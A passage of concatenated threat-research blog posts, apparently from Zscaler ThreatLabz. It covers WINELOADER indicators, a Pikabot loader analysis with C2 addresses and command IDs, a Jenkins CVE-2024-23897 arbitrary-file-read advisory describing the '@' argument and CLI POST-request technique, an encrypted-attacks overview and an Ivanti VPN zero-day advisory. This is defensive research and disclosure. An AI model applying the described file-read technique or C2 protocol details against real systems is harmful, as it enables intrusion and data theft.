ad43bbb21e2524a71bad5312a7b74af223090a8375f586d65ff239410bbd81a7
wine.pdf (July 2023 invitation)
3739b2eae11c8367b576869b68d502b97676fb68d18cc0045f661fbe354afcb9
wine.pdf (Feb 2024 invitation)
1c7593078f69f642b3442dc558cddff4347334ed7c96cd096367afd08dca67bc
wine.hta
e477f52a5f67830d81cf417434991fe088bfec21984514a5ee22c1bcffe1f2bc
WINELOADER core module
f61cee951b7024fca048175ca0606bfd550437f5ba2824c50d10bef8fb54ca45
WINELOADER core module (RC4-encrypted)
c1223aa67a72e6c4a9a61bf3733b68bfbe08add41b73ad133a7c640ba265a19e
WINELOADER persistence module loader
b014cdff3ac877bdd329ca0c02bdd604817e7af36ad82f912132c50355af0920
WINELOADER persistence module
7600d4bb4e159b38408cb4f3a4fa19a5526eec0051c8c508ef1045f75b0f6083
WINELOADER persistence module (RC4-encrypted)
URL
Description
hxxps://castechtools[.]com/api.php
WINELOADER C2
hxxps://seeceafcleaners[.]co[.]uk/cert.php
Downloads base64-encoded ZIP archive from this URL.
hxxps://seeceafcleaners[.]co[.]uk/wine.php
Downloads the ZIP archive containing the wine.hta file.
hxxps://passatempobasico[.]com[.]br/wine.php
Downloads the ZIP archive containing the wine.hta file (IOC from July 2023).
MITRE ATT&CK Framework
ID
Tactic
Description
T1204.002
User Execution: Malicious File
The PDF file that masquerades as an invitation contains a malicious link.
T1656
Impersonation
The contents of the PDF are crafted to impersonate the Ambassador of India.
T1204.001
User Execution: Malicious Link
The PDF file contains a link that leads to the download of a malicious ZIP archive.
T1574.002
Hijack Execution Flow: DLL Side-Loading
sqlwriter.exe is used to DLL side-load vcruntime140.dll.
T1055.001
Process Injection: Dynamic-link Library Injection
DLL hollowing is used to load a randomly chosen system DLL into sqlwriter.exe process memory and inject WINELOADER in that DLL.
T1573.001
Encrypted Channel: Symmetric Cryptography
RC4 stream cipher is used to encrypt the data exchanged between WINELOADER and the C2 server.
T1041
Exfiltration Over C2 Channel
Data is encrypted and exfiltrated to the C2 server.
T1584
Compromise Infrastructure
Compromised sites are used for hosting payloads and as a C2 server.
T1053.005
Scheduled Task/Job: Scheduled Task
A scheduled task with the name “MS SQL Writer” is created to ensure sqlwriter.exe is executed to kick-start the infection chain.
T1547.001
Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
WINELOADER can be configured to execute on Windows startup by setting the registry key at HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MS SQL Writer.
T1140
Deobfuscate/Decode Files or Information
WINELOADER strings and modules are encrypted with RC4. Sensitive data is often re-encrypted or zeroed out after use.
T1036.001
Masquerading: Invalid Code Signature
vcruntime140.dll has an invalid Microsoft code signing certificate.
T1036.004
Masquerading: Masquerade Task or Service
The scheduled task created for persistence masquerades as a legitimate Microsoft scheduled task.
T1027.007
Obfuscated Files or Information: Dynamic API Resolution
API names are decrypted before they are dynamically resolved and called.
T1027.009
Obfuscated Files or Information: Embedded Payloads
WINELOADER modules are encrypted with RC4 within vcruntime140.dll and C2 responses.
T1218.005
System Binary Proxy Execution: Mshta
mshta.exe executes wine.hta, which contains malicious JS downloader code.
T1033
System Owner/User Discovery
WINELOADER sends the current user and system name in each C2 request.
T1071.001
Application Layer Protocol: Web Protocols
WINELOADER communicates with its C2 via HTTPS. HTTP GET requests contain a request body that is atypical of such requests.
T1001.001
Data Obfuscation: Junk Data
WINELOADER prepends a randomized number of junk bytes to the request data before encrypting and sending it to the C2.
Appendix
Below is the full 256-byte RC4 key embedded inside WINELOADER that is used to encrypt and decrypt the information exchanged between the malware and the C2 server.
Tue, 27 Feb 2024 09:32:38 -0800Sudeep Singhhttps://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloaderThe (D)Evolution of Pikabot
https://www.zscaler.com/blogs/security-research/d-evolution-pikabot
Introduction
Pikabot is a malware loader that originally emerged in early 2023. Over the past year, ThreatLabz has been tracking the development of Pikabot and its modus operandi. There was a significant increase in usage of Pikabot in the second half of 2023, following the FBI-led takedown of Qakbot. This was likely the result of a BlackBasta ransomware affiliate replacing Qakbot with Pikabot for initial access. However, Pikabot ceased activity shortly after Christmas 2023, with its version number being 1.1.19 at that time.
In recent campaigns, which started in February 2024, Pikabot reemerged with significant changes in its code base and structure. Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications.
Key Takeaways
Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023.
In December 2023, Pikabot activity ceased, possibly as a result of a new version of Qakbot that emerged. In February 2024, a new version of Pikabot was released with significant changes.
Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms.
Pikabot now stores all configuration elements in a single memory block, similar to Qakbot. In prior versions, Pikabot decrypted necessary configuration elements only when required.
Pikabot continues to use HTTP for command-and-control, but its network protocol has changed, including the network command IDs and the encryption algorithms.
Technical AnalysisAs covered in our previous technical analysis of Pikabot, the malware consists of two components: a loader and a core module. The core module is responsible for executing commands and injecting payloads from a command-and-control server. The malware uses a code injector to decrypt and inject the core module. It employs various anti-analysis techniques and string obfuscation. Pikabot uses similar distribution methods, campaigns, and behaviors as Qakbot. The malware acts as a backdoor, allowing the attacker to control the infected system and distribute other malicious payloads such as Cobalt Strike.In the following sections, we will describe the latest Pikabot variant, including its capabilities and notable changes compared to previous versions. The analysis was performed on Pikabot binaries with version 1.8.32.Anti-analysis techniquesAs with previous versions of Pikabot, this variant employs a series of different anti-analysis techniques to make the analysis more time-consuming. It should be noted that none of the methods below presents any significant advanced capabilities. Furthermore, Pikabot used a series of more advanced detection features in its loader component in previous versions of the malware.Strings encryptionThe most notable change is the string obfuscation. In previous versions of Pikabot, each string was obfuscated by combining the RC4 algorithm with AES-CBC. This method was highly effective in preventing analysis, particularly when it came to automated configuration extraction. To successfully analyze Pikabot, an analyst would need to detect not only the encrypted string but also its unique RC4 key. Additionally, they would need to extract the AES key and initialization vector, which are unique to each Pikabot payload.It should be noted that the approach the Pikabot malware developers followed is similar to the ADVobfuscator.In the latest version of Pikabot, the majority of the strings are either constructed by retrieving each character and pushing it onto the stack (Figure 1) or, in some rare cases, a few strings are still encrypted using the RC4 algorithm only.Figure 1. String stack constructionJunk instructionsThis anti-analysis technique was also implemented in previous versions of Pikabot. Pikabot inserts junk code between valid instructions. The junk code is either inlined in the function or a call is made to a function, which contains the junk code (Figure 2).Figure 2. Junk codeAnti-debug methodsPikabot uses two methods to detect a debugging session. They are:Reading the BeingDebugged flag from the PEB (Process Environment Block).Calling the Microsoft Windows API function CheckRemoteDebuggerPresent.Pikabot constantly performs the debugging checks above in certain parts of its code. For example, when it (en/de)codes network data or when it makes a request to receive a network command.Anti-sandbox evasionIn addition to the anti-debugging checks above, Pikabot uses the following methods to evade security products and sandboxes:Pikabot utilizes native Windows API calls.Pikabot delays code execution at different stages of its code. The timer is randomly generated each time.Pikabot dynamically resolves all required Windows API functions via API hashing.A Python representation of the algorithm is available below.Language detectionIdentical to previous versions, Pikabot stops execution if the operating system's language is any of the following:Russian (Russia)Ukrainian (Ukraine)This is likely an indication that the threat actors behind Pikabot are Russian-speaking and may reside in Ukraine and/or Russia. The language check reduces the chance of law enforcement action and potential criminal prosecution in those regions.Bot initialization phaseUnlike previous versions, this version of Pikabot stores all settings and information in a single structure at a global address (similar to Qakbot). The analyzed structure is shown below. For brevity, we redacted non-important items of the structure (such as Windows API names).Bot configurationThe latest version of Pikabot stores its entire configuration in plaintext in one address. This is a significant drawback since in previous versions, Pikabot decrypted each required element at runtime and only when required. In addition, many of the configuration elements (e.g. command-and-control URIs) were randomized. ANALYST NOTE: Despite their randomization, all configuration elements were valid on the server-side. If a bot sent incorrect information, then it would get rejected/banned by the command-and-control server.The configuration structure is the following:Once Pikabot parses the plaintext configuration, it erases it by setting all bytes to zero. We assess that this is an anti-dumping method to avoid automating the extraction of the configuration.Lastly, Pikabot loads any remaining required Windows API functions and generates a bot identifier for the compromised host. The algorithm is similar to previous versions and can be reproduced with the following Python code.ANALYST NOTE: In some samples, Pikabot does not read the volume serial number due to a bug in their code that causes a failure when calling GetVolumeInformationW.Network communicationsPikabot contacts the command-and-control server to request and receive network commands. In this version, the network protocol has considerably changed. Pikabot starts by registering the compromised host to its server. First, Pikabot collects information from the compromised host, such as:Monitor’s display settingsWindows versionHostname/username and operating system’s memory sizeBeacon and delay settingsProcess information such as the process ID, parent process ID and number of threads (see the description of network command 0x985 for a comprehensive list).Bot’s version and campaign nameName of the domain controllerThen Pikabot appends the following information to the registration packet:32-bytes network RC4 key (unique per host), which remains the same for the session. In previous versions, Pikabot was using AES-CBC with a random key/IV per request.Unknown registry key name. We observed it used only in the network command with ID 0x246F.Number of swap rounds used for encoding the data. This remains the same for the rest of the session.Next, Pikabot encrypts the data using the RC4 algorithm, encodes the encrypted output, picks a random URI from its list, and sends the data with a POST request to the command-and-control server.The encoding involves bytes swapping for N times, where N is a randomly generated number in the range 0-25.ANALYST NOTE: Despite the fact that a round number is set in the configuration (see the configuration structure), this value is ignored and Pikabot replaces it with a random value. Moreover, Pikabot has completely removed the JSON format in its network packets and inserts everything in a raw format.If the bot registration is successful, Pikabot starts an infinite loop to request and execute commands. Each incoming network command (with the exception of network command with ID 0x164) has a task ID that is placed at the start of the (decrypted) packet as a QWORD value. In Table 1 below, we list the identified network commands along with a description of their functionality.Command IDDescription0x164Requests command from command-and-control server. The packet includes the command ID, size of bot ID, and the bot ID. The server replies with the same command ID if there is no network command for the bot to execute.0x555Reports the output of the executed network command to the command-and-control server.0x1291Registers the bot. An unknown integer value (0x1687) is appended in the packet at offset 8.0x1FEDUpdates beacon time.0x1A5ATerminates/kills the bot.0x2672Not implemented0x246FWrites a file to disk and adds registry data using the value name specified in the configuration (unknown_registry_key_name).0xACBExecutes the system command and sends back the output. Includes the error code 0x1B3 if there is no output.0x36CInjects the code of a downloaded PE file. The target process information is specified in the network packet.0x792Injects the code of a downloaded shellcode. The target process information is specified in the network packet.0x359Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x3A6Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x240Executes system command and sends back the output.Note: Same as 0xACB but does not send the error code.0x985Collects processes’ information. These are:Executable's filenameProcess IDBoolean flag, which indicates if it is a Pikabot process.Boolean flag, which indicates if Pikabot can access the process with all possible access rights.Number of threadsBase priority of threadsProcess architectureParent process ID0x982Not implementedTable 1. Pikabot Network CommandsConclusion
Despite its recent inactivity, Pikabot continues to pose a significant cyber threat and is in constant development. However, the developers have decided to take a different approach and decrease the complexity level of Pikabot's code by removing advanced obfuscation features. Moreover, based on our code analysis, it appears that certain features and network commands have not been implemented yet and are still a work in progress.
Zscaler ThreatLabz continues to track this threat and add detections to protect our customers.
Indicators Of Compromise (IOCs)
SHA256
Description
555687ca3149e23ee980a3acf578e0572da556cf34c87aecf48596834d6b496f
Pikabot sample (version 1.8.32-beta)
ca5fb5814ec62c8f04936740aabe2664b3c7d036203afbd8425cd67cf1f4b79d
Pikabot sample (version 1.8.32-beta)
IOC
Description
104.129.55[.]103:2224
Command-and-Control server
178.18.246[.]136:2078
Command-and-Control server
158.220.80[.]167:2967
Command-and-Control server
104.129.55[.]104:2223
Command-and-Control server
23.226.138[.]161:5242
Command-and-Control server
37.60.242[.]85:9785
Command-and-Control server
23.226.138[.]143:2083
Command-and-Control server
37.60.242[.]86:2967
Command-and-Control server
85.239.243[.]155:5000
Command-and-Control server
158.220.80[.]157:9785
Command-and-Control server
65.20.66[.]218:5938
Command-and-Control server
95.179.191[.]137:5938
Command-and-Control server
139.84.237[.]229:2967
Command-and-Control server
Zscaler Coverage
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names:
Win32.Trojan.PikaBot
Win32.Downloader.PikaBot
Mon, 12 Feb 2024 10:11:52 -0800Nikolaos Pantazopouloshttps://www.zscaler.com/blogs/security-research/d-evolution-pikabotJenkins Arbitrary File Leak Vulnerability, CVE-2024-23897, Can Lead To RCE
https://www.zscaler.com/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rce
Introduction
Jenkins, a Java-based open-source automation server widely used by developers for application building, testing, and deployment, has issued an advisory about a critical vulnerability that could potentially enable remote code execution (RCE).
This vulnerability, identified as CVE-2024-23897, poses a high risk and affects Jenkins integrated command line interfaces (CLI). With a CVSS score of 9.8, unauthorized access to files through the CLI is possible, potentially leading to RCE.
In addition to file access, CVE-2024-23897 can be leveraged to access binary files that contain cryptographic keys utilized for various Jenkins functionalities, albeit with certain limitations. Unauthorized access to this sensitive information can result in:
RCE through the exploitation of resource root URLs
RCE by manipulating a "Remember me" cookie
RCE through stored cross-site scripting (XSS) attacks via build logs
RCE by bypassing CSRF protection
Decryption of stored secrets in Jenkins
Deletion of any item within Jenkins
The downloading of Java heap dumps
Affected Versions
The vulnerability affects Jenkins versions up to 2.441 and LTS (Long-Term Support) versions up to 2.426.2.
Technical Details
The vulnerability originates from Jenkins' use of the args4j library for parsing command arguments and options on the Jenkins controller during the processing of CLI commands. Originally intended to enhance usability, a specific feature within args4j that replaces a file path preceded by an "@" character with the file's contents has become a significant security issue. This feature is enabled by default and remains unchecked in versions up to 2.441 and LTS 2.426.2. Exploiting this vulnerability allows attackers to read any files on the Jenkins controller file system using the default character encoding of the Jenkins controller process. When Jenkins CLI tool arguments are prefixed with “@”, they are mistakenly interpreted as files that need to be opened to read the arguments. In certain scenarios, lines from these files are inadvertently included in error messages and transmitted to the CLI user.
Two Jenkins configuration options pose significant security risks by allowing unauthenticated attackers to impersonate authenticated users. The first option, “Allow users to register,” enables anyone with access to a Jenkins instance to register an account. Additionally, the “Enable anonymous read permission” option grants universal read permissions, allowing any Jenkins user to access and read the entire content of arbitrary files on the Jenkins server when these options are enabled.
Figure 1. Jenkins configuration options
The figure below is an example taking the first rows of the C:\Users\IEUser\AppData\Local\Temp\JenkinsTest.txt (a random file created on the Jenkins server for demonstration) file using the CLI help command.
Figure 2. A demonstration text file created on the Jenkins server
There are two ways to invoke this vulnerability:
Using Jenkins-cli.jar: This common approach involves utilizing Jenkins-cli.jar, which operates through web sockets or SSH. Specifically, commands such as shutdown, enable-job, help, and connect-node from the Jenkins CLI tool are manipulated to illicitly access and read the content of files on the Jenkins server. The figure below shows the help command running on Jenkins CLI to read a file.
Figure 3. Running the help command with Jenkins CLI tool to read the file content on Jenkins
The figure below shows the file content being read from the Jenkins server.
Figure 4: File content read from the Jenkins server
Sending POST requests: An alternative method is to send two POST requests to http://jenkins/cli?remoting=false. This technique requires the use of a downloader and an uploader. The downloader fetches the response of the CLI command, while the uploader executes a specified CLI command provided in the body of the request. The connection between the downloader and uploader is established by utilizing the UUID from the session header.
Figure 5. Attack workflow demonstrating malicious HTTP request
Recommendations
To mitigate this vulnerability, upgrade to at least Jenkins versions 2.442 and LTS 2.426.3. This patch disables the command parser feature responsible for the vulnerability.
Those unable to immediately update to Jenkins 2.442 and LTS 2.426.3 should disable access to the Jenkins CLI, as this is expected to prevent exploitation.
For instructions, see the documentation for this workaround.
Zscaler Coverage
The Zscaler ThreatLabZ team has deployed protection.
Zscaler Advanced Threat Protection:
APP.EXPLOIT.CVE-2024-23897
References
CVE-2024-23897 (CVSS 9.8): Critical Jenkins Security Vulnerability, RCE Possible
Jenkins Security Advisory 2024-01-24
CVE-2024-23897.py
poc.py - binganao/CVE-2024-23897 · GitHub
RCE Jenkins CVE-2024–23897. Background Story | by Syed Abeer Ahmed
Jenkins 2.441 / LTS 2.426.3 Arbitrary File Read ≈ Packet Storm
Tue, 06 Feb 2024 15:44:05 -0800Avinash Kumarhttps://www.zscaler.com/blogs/security-research/jenkins-arbitrary-file-leak-vulnerability-cve-2024-23897-can-lead-rceEncrypted Attacks: Impact on Public Sector
https://www.zscaler.com/blogs/security-research/encrypted-attacks-impact-public-sector
Following FBI and CISA warnings to public sector defenders in November regarding increased targeting by infamous ransomware groups, the imperative to understand and defend against evolving — and increasingly covert — cyber threats has intensified. According to Zscaler ThreatLabz analysis of the 2023 threat landscape, 86% of threats hide within encrypted traffic. What does this mean for the public sector?
HTTPS has long been a cornerstone for protecting data, with nearly 95% of web traffic utilizing it today. For public sector entities like federal agencies and contractors, encryption is essential to meeting modern security and compliance requirements.
However, despite its association with security and privacy protocols, the surge in encrypted attacks suggests that encryption is becoming more synonymous with “obscurity” than “security.”
This blog post delves into the encrypted threats landscape, sheds light on how encrypted attacks can impact public sector organizations, and reveals four ways to stop encrypted threats with Zscaler.
The encryption paradox escalates
Encryption may be essential for data protection, but it simultaneously acts as a veil for malicious activities, from malware distribution to phishing scams, as proven in the recently released ThreatLabz State of Encrypted Attacks Report.
ThreatLabz analysis of 29.8 billion threats revealed the striking percentage of threats embedded in encrypted traffic (86%) amounts to a 24.3% year-over-year growth in encrypted threats. This trend underscores the sophisticated and multifaceted nature of threats and tactics leveraging encrypted channels to evade detection.
Understanding encrypted attacks
Encrypted attacks exploit the very protocols designed to secure data transmission, making it challenging for traditional security measures to detect and thwart their activity. Our ThreatLabz report analyzes the top 10 encrypted threat categories, including emerging threats and unique attack vectors. Here's a look at the three most predominant encrypted threats and their operational dynamics:
Malware distribution: Encrypted malware is the top threat, constituting 78.1% of observed attacks, and includes malicious payloads, infected web content, and viruses. The malware threat poses a significant risk to the integrity of public sector networks — including loss of control over critical systems and potential cascading effects on other critical operations.
Ad spyware sites: 18.1% of encrypted attacks occurred through ad spyware sites. These websites covertly distribute adware and spyware, inundating users with intrusive pop-up ads. These attacks not only compromise user experience but also discreetly harvest personal data, raising privacy and security concerns.
Phishing scams: Encrypted phishing increased by 13.7% year-over-year. Utilizing encrypted channels, cybercriminals host phishing sites that mimic legitimate websites, as demonstrated in the report. The most popular phishing attacks observed by ThreatLabz were linked to applications owned by Microsoft, Adobe, Google, Facebook, Amazon, Netflix, and others.
These threats provide just a glimpse into the intricate landscape of encrypted attacks. Delving deeper involves understanding the current impact of encrypted attacks on critical public sector industries.
Key considerations for public sector
As the public sector has increasingly adopted encryption, it is not surprising that our research found public sector industries among those most impacted by encrypted attacks.
Here are a few more key findings and considerations relevant to the public sector. For the complete findings and analysis, download this version of the report.
The government sector experienced a sharp rise in encrypted attacks, with a 185% year-over-year increase. Government entities — especially those involved in election processes this year — are an attractive target for cybercriminals, including sophisticated nation-state-backed groups, due to their pivotal role in shaping and safeguarding national interests. The ThreatLabz team anticipates that advanced persistent threats (APTs), which have a history of election interference, will increasingly exploit encryption vulnerabilities to infiltrate target networks and conceal their activities.
Education topped the government sector, however, with a 276% year-over-year surge in encrypted attacks. As the education sector continues to embrace digital transformation, adopting innovative systems and tools that handle vast amounts of sensitive student data expands its attack surface — amounting to greater vulnerability and desirability as a top target for encrypted attacks.
The manufacturing industry, crucial to the supply chain of public sector organizations, experienced a 25.4% increase in encrypted attacks. The sector's embrace of Industry 4.0 has not only improved efficiency but has also expanded its attack surface. This expansion creates new entry points that cybercriminals increasingly exploit. Given its pivotal role in national security, attacks on the manufacturing sector pose significant risks to the public sector.
While government and educational entities face distinctive risks when it comes to encrypted attacks, it is imperative for all public sector organizations, contractors, and suppliers to acknowledge and address these potential threats. The impact of encrypted threats goes beyond mere data breaches — it extends to the resilience of critical infrastructure and essential services and the integrity of national security. Public sector organizations must take strategic measures to secure encrypted traffic and fortify defenses against evolving encrypted threats.
Encrypted threats across the attack chain
It’s important to note that threat actors leverage encrypted channels across all stages of the attack chain — not just during compromise. As mentioned, cybercriminals frequently abuse legitimate, trusted websites to execute their attack, which means that public entities need a defense-in-depth strategy to counter them at all stages.
As one example, in recent DuckTail operations exposed by Zscaler, these APTs hide their efforts with TLS encryption throughout all stages of attack. First, they target business Facebook, Google Ad, and TikTok accounts, luring users to fake ChatGPT and Google Bard AI pages to install malware payloads, which are hosted on trusted SaaS sites like DropBox and iCloud, and abuse their legitimate TLS certificates. Once those malware payloads are installed on users’ devices, they communicate with a GitLab URL for ongoing command-and-control (C2) activity — yet another trusted encrypted channel.
Zscaler has worked closely with these organizations to take down DuckTail activity. However, this variety of encrypted attack remains prevalent. Without the ability to inspect encrypted SSL/TLS traffic throughout all stages of an attack, public sector entities may remain vulnerable.
4 steps to stop encrypted attacks
Adopting a zero trust architecture is foundational to effectively stopping encrypted attacks at each stage of the attack sequence. The following four steps comprise a comprehensive strategy for public sector organizations to secure encrypted traffic and improve resilience:
Inspect all encrypted traffic with a zero trust, cloud-proxy architecture: Employing a zero trust architecture is crucial for scanning all encrypted traffic at scale. SSL/TLS inspection should be applied for every packet on a per-user basis, ensuring infinite scalability.
Minimize the attack surface: Hide internet-facing assets using a cloud proxy and restrict application access to only authorized users. This significantly reduces the attack surface and the risk of being discovered by attackers, mitigating potential encrypted attacks.
Prevent initial compromise with inline threat prevention: Deploy inline defenses in the data path to detect and prevent encrypted threats efficiently. Core technologies should incorporate artificial intelligence and machine learning and include an AI/ML-driven cloud sandbox, cloud IPS, URL filtering, DNS filtering, and browser isolation.
Stop data loss: Securing data in motion requires implementing inline data loss prevention (DLP) for inspecting SSL/TLS content. Incorporating AI-driven data discovery and classification is vital to prevent unauthorized data exfiltration and uphold the integrity of sensitive information.
Read more about each of these steps in our report.
Conclusion
As the public sector confronts the evolving threat of encrypted attacks, it’s important to stay vigilant and adaptive. Understanding the nuances of encrypted attacks, inspecting all encrypted traffic, and implementing a comprehensive zero trust platform are indispensable steps for public sector organizations to effectively navigate the encryption paradox and defend against these attacks.
Learn more about the encrypted threat landscape and how to improve your organization’s resilience to these attacks. Download the ThreatLabz 2023 State of Encrypted Attacks Report for additional guidance and the full findings and analysis.
Mon, 05 Feb 2024 07:30:49 -0800Jeremy Jameshttps://www.zscaler.com/blogs/security-research/encrypted-attacks-impact-public-sectorThreatLabz Coverage Advisory: Ivanti’s VPN Vulnerabilities Exploited by Hackers, New Zero-Days Pose Critical Risk
https://www.zscaler.com/blogs/security-research/threatlabz-coverage-advisory-ivanti-s-vpn-vulnerabilities-exploited-hackers
Introduction
Ivanti, an IT management and security company, has issued a warning about multiple zero-day vulnerabilities in its VPN products exploited by Chinese state-backed hackers since December 2023. The initial disclosure involved two CVEs (CVE-2023-46805 and CVE-2023-21887) allowing a remote attacker to perform authentication bypass and remote command injection exploits. Ivanti released a patch which was immediately bypassed by two additional flaws (CVE-2024-21888 and CVE-2024-21893) that allows an attacker to perform privilege escalation and server-side request forgery exploits.
The Cybersecurity & Infrastructure Security Agency (CISA) released an initial advisory as well as an emergency directive (ED-24-01) setting the timeline for mitigating the original two issues by 11:59PM EST January 22, 2024. In the wake of the two new vulnerabilities being discovered and no patches available, CISA issued a supplemental direction to the emergency directive instructing Federal Civilian Executive Branch agencies to disconnect all instances of Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) solutions no later than 11:59 PM EST February 2, 2024 from agency networks.
Recommendations
For CVE-2023-46805 and CVE-2023-21887
Apply the patch: Ivanti released a patch to address the initial two vulnerabilities. Users are advised to apply this patch promptly to secure their systems.
Factory reset before patch: Ivanti recommends users to perform a factory reset on their appliance before applying the patch. This precautionary step aims to prevent potential threat actors from gaining upgrade persistence in the environment.
For CVE-2023-21888 and CVE-2023-21893
CISA supplemental direction (ED-24-01): CISA instructed federal agencies to disconnect all instances of Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) solutions from agency networks. Although the CISA guidance mandates this for FCEB agencies, CISA highly recommends all organizations to follow the recommended steps.
Apply the patches as they become available following the recommended guidance.
For all discovered issues
Prioritize segmentation of all potentially impacted systems from enterprise resources to reduce the blast radius.
Continue threat hunting activity for all devices connected to and from the impacted Ivanti products.
Monitor identity management services and authentication anomalies.
Actively audit privileged accounts that were recently created or updated.
Rotate certificates, keys, and passwords for all connected or exposed systems and applications.
Attribution
UTA0178, China’s government-backed hacking group motivated by espionage, is believed to be responsible for exploiting vulnerabilities in ICS VPN. The same group was attributed to the attacks concentrating on the Philippines using the MISTCLOAK, BLUEHAZE, and DARKDEW malware families.
How It Works
The attackers were observed exploiting two vulnerabilities CVE-2023-46805 (an authentication-bypass vulnerability with a CVSS score of 8.2) and CVE-2024-21887 (a command-injection vulnerability found in multiple web components with a CVSS score of 9.1) to gain access to ICS VPN appliances. Initial activity was observed as early as December 3, 2023. They were mostly living off the land but some tools were also deployed.
Tools used by the threat actor include:
PySoxy tunneler and BusyBox to enable post-exploitation activity
ZIPLINE Passive Backdoor
THINSPOOL Dropper
LIGHTWIRE
WIREFIRE, BUSHWALK, and CHAINLINE Web Shells
WARPWIRE
Attack Chain
Figure 1: Diagram depicting the attack chain
Possible Execution
Initial Exploitation: The attackers performed mass scanning for vulnerable devices and potential automated exploitation.
Persistence: The attackers deployed different variations of web shells on the targeted devices after successful exploitation. After gaining an initial foothold, the attacker could steal configuration data, modify existing files, download remote files, and reverse tunnel from the devices. In addition, the attackers backdoored configuration files and deployed additional tools.
Reconnaissance: The attackers performed reconnaissance of the internal systems and applications through proxied connections.
Credential Stealing: The attackers injected a custom JavaScript-based malware, called WARPWIRE, into a login page used by the users to capture and exfiltrate plaintext credentials.
Lateral Movement: The attackers used lateral movement using compromised credentials to connect to internal systems via RDP, SMB, and SSH.
Evidence Wiping: The attackers were observed wiping logs and even restoring the system to a clean state after deploying their payloads.
Evasion (Patch and Detection): In some instances, the attackers modified the integrity checker tool (ICT) to disable and prevent it from flagging any modifications or additions on the system as a measure to evade detection. The ZIPLINE tool used by the attackers is capable of bypassing ICT detection by adding itself to the exclusion_list used by the ICT tool. Moreover, as the attacks were discovered and publicized, the attackers quickly adapted by modifying the tools to evade detection. As a result, new variants of the initial-attack are being observed in more recent attacks.
How Zscaler Can Help
Zscaler’s cloud native zero trust network access (ZTNA) solution gives users fast, secure access to private apps for all users, from any location. Reduce your attack surface and the risk of lateral threat movement—no more internet-exposed remote access IP addresses, and secure inside-out brokered connections. Easy to deploy and enforce consistent security policies across campus and remote users.
Zscaler Private Access™ (ZPA) allows organizations to secure private app access from anywhere. Connect users to apps, never the network, with AI-powered user-to-app segmentation. Prevent lateral threat movement with inside-out connections.
Deploy comprehensive cyberthreat and data protection for private apps with integrated application protection, deception, and data protection.
Figure 2: VPN vulnerabilities open doors to cyber threats, protect against these risks with Zero Trust architecture.
Zero trust is a fundamentally different architecture than those built upon firewalls and VPNs. It delivers security as a service from the cloud and at the edge, instead of requiring you to backhaul traffic to complex stacks of appliances (whether hardware or virtual). It provides secure any-to-any connectivity in a one-to-one fashion; for example, connecting any user directly to any application. It does not put any entities on the network as a whole, and adheres to the principle of least-privileged access. In other words, with zero trust, security and connectivity are successfully decoupled from the network, allowing you to circumvent the aforementioned challenges of perimeter-based approaches. Zero trust architecture:
Minimizes the attack surface by eliminating firewalls, VPNs, and public-facing IP addresses, allowing no inbound connections, and hiding apps behind a zero trust cloud.
Stops compromise by leveraging the power of the cloud to inspect all traffic, including encrypted traffic at scale, in order to enforce policies and stop threats in real-time.
Prevents lateral threat movement by connecting entities to individual IT resources instead of extending access to the network as a whole.
Blocks data loss by enforcing policies across all potential leakage paths (including encrypted traffic), protecting data in motion, data at rest, and data in use.
Additionally, zero trust architecture overcomes countless other problems associated with firewalls, VPNs, and perimeter-based architectures by enhancing user experiences, decreasing operational complexity, saving your organization money, and more.
Zscaler ThreatLabz recommends our customers implement the following capabilities to safeguard against these type of attacks:
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access to establish user-to-app segmentation policies based on the principles of least privileged access, including for employees and third-party contractors.
Limit the impact from a potential compromise by restricting lateral movement with identity-based microsegmentation.
Prevent private exploitation of private applications from compromised users with full in-line inspection of private app traffic with Zscaler Private Access.
Use Advanced Cloud Sandbox to prevent unknown malware delivered in second stage payloads.
Detect and contain attackers attempting to move laterally or escalate privileges by luring them with decoy servers, applications, directories, and user accounts with Zscaler Deception.
Identify and stop malicious activity from compromised systems by routing all server traffic through Zscaler Internet Access.
Restrict traffic from critical infrastructure to an “allow” list of known-good destinations.
Ensure that you are inspecting all SSL/TLS traffic, even if it comes from trusted sources.
Turn on Advanced Threat Protection to block all known command-and-control domains.
Extend command-and-control protection to all ports and protocols with the Advanced Cloud Firewall, including emerging C&C destinations.
Best Practices
Follow CISA Directives
Timely compliance with CISA’s Emergency Directive on Ivanti Vulnerabilities is critical for minimizing the impact of these vulnerabilities.
Implement zero trust architecture
Enterprises must rethink traditional approaches to security, replacing vulnerable appliances like VPNs and firewalls. Implementing a true zero trust architecture, fortified by AI/ML models, to block and isolate malicious traffic and threats is a critical foundational step. Prioritize user-to-application segmentation where you are not bringing users on the same network as your applications. This provides an effective way to prevent lateral movement and keep attackers from reaching crown jewel applications.
Proactive Measures to Safeguard Your Environment
In light of the recent vulnerabilities affecting Ivanti, it is imperative to employ the following best practices to fortify your organization against potential exploits.
Minimize the attack surface: Make apps (and vulnerable VPNs) invisible to the internet, and impossible to compromise, ensuring an attacker can’t gain initial access.
Prevent initial compromise: Inspect all traffic in-line to automatically stop zero-day exploits, malware, or other sophisticated threats.
Enforce least privileged access: Restrict permissions for users, traffic, systems, and applications using identity and context, ensuring only authorized users can access named resources.
Block unauthorized access: Use strong multi-factor authentication (MFA) to validate user access requests.
Eliminate lateral movement: Connect users directly to apps, not the network, to limit the blast radius of a potential incident.
Shutdown compromised users and insider threats: Enable inline inspection and monitoring to detect compromised users with access to your network, private applications, and data.
Stop data loss: Inspect data in motion and data at rest to stop active data theft during an attack.
Deploy active defenses: Leverage deception technology with decoys and perform daily threat hunting to derail and capture attacks in real-time.
Cultivate a security culture: Many breaches begin with compromising a single user account via a phishing attack. Prioritizing regular cybersecurity awareness training can help reduce this risk and protect your employees from compromise.
